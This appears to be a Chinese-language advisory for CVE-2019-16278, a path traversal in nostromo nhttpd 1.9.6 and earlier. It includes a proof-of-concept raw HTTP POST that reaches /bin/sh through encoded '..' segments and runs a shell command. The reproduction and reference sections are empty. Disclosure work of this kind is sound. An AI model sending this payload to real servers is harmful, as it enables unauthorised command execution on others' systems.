nostromo nhttpd 路径遍历漏洞

0X00 简介

  • nostromo nhttpd是一款开源的Web服务器。 nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

0X01 CVE编号

  • CVE-2019-16278

0X02 漏洞威胁等级

  • 高危

0X03 影响范围

  • nostromo nhttpd <= 1.9.6

0X04 漏洞描述

  • nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

0X05 漏洞POC

  • CVE-2019-16278.sh

    1
    2
    3
    4
    5
    6
    7
    8
    POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    Content-Length: 25

    echo
    echo
    ifconfig 2>&1

0X06 漏洞复现

0X07 修复建议

  • 上waf或防火墙配置规则拦截,等待官方修复打补丁。

0X08 Reference